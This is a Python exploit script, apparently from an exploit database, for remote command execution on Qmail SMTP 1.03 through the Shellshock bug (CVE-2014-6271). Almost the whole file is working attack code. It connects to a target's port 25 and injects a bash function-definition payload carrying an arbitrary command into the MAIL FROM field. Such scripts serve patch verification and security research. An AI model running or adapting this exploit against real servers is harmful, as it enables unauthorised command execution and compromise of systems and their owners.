66 lines
No EOL
1.7 KiB
Text
66 lines
No EOL
1.7 KiB
Text
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
|
|
# Date: 2020-07-03
|
|
# Exploit Author: 1F98D
|
|
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
|
|
# Version: Qmail 1.03
|
|
# Tested on: Debian 9.11 (x64)
|
|
# CVE: CVE-2014-6271
|
|
# References:
|
|
# http://seclists.org/oss-sec/2014/q3/649
|
|
# https://lists.gt.net/qmail/users/138578
|
|
#
|
|
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
|
|
# in the MAIL FROM field.
|
|
#
|
|
#!/usr/local/bin/python3
|
|
|
|
from socket import *
|
|
import sys
|
|
|
|
if len(sys.argv) != 4:
|
|
print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
|
|
print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
|
|
sys.exit(1)
|
|
|
|
TARGET = sys.argv[1]
|
|
MAILTO = sys.argv[2]
|
|
CMD = sys.argv[3]
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.connect((TARGET, 25))
|
|
|
|
res = s.recv(1024)
|
|
if 'ESMTP' not in str(res):
|
|
print('[!] No ESMTP detected')
|
|
print('[!] Received {}'.format(str(res)))
|
|
print('[!] Exiting...')
|
|
sys.exit(1)
|
|
|
|
print('[*] ESMTP detected')
|
|
s.send(b'HELO x\r\n')
|
|
res = s.recv(1024)
|
|
if '250' not in str(res):
|
|
print('[!] Error connecting, expected 250')
|
|
print('[!] Received: {}'.format(str(res)))
|
|
print('[!] Exiting...')
|
|
sys.exit(1)
|
|
|
|
print('[*] Connected, sending payload')
|
|
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
|
|
res = s.recv(1024)
|
|
if '250' not in str(res):
|
|
print('[!] Error sending payload, expected 250')
|
|
print('[!] Received: {}'.format(str(res)))
|
|
print('[!] Exiting...')
|
|
sys.exit(1)
|
|
|
|
print('[*] Payload sent')
|
|
s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
|
|
s.recv(1024)
|
|
s.send(b'DATA\r\n')
|
|
s.recv(1024)
|
|
s.send(b'\r\nxxx\r\n.\r\n')
|
|
s.recv(1024)
|
|
s.send(b'QUIT\r\n')
|
|
s.recv(1024)
|
|
print('[*] Done') |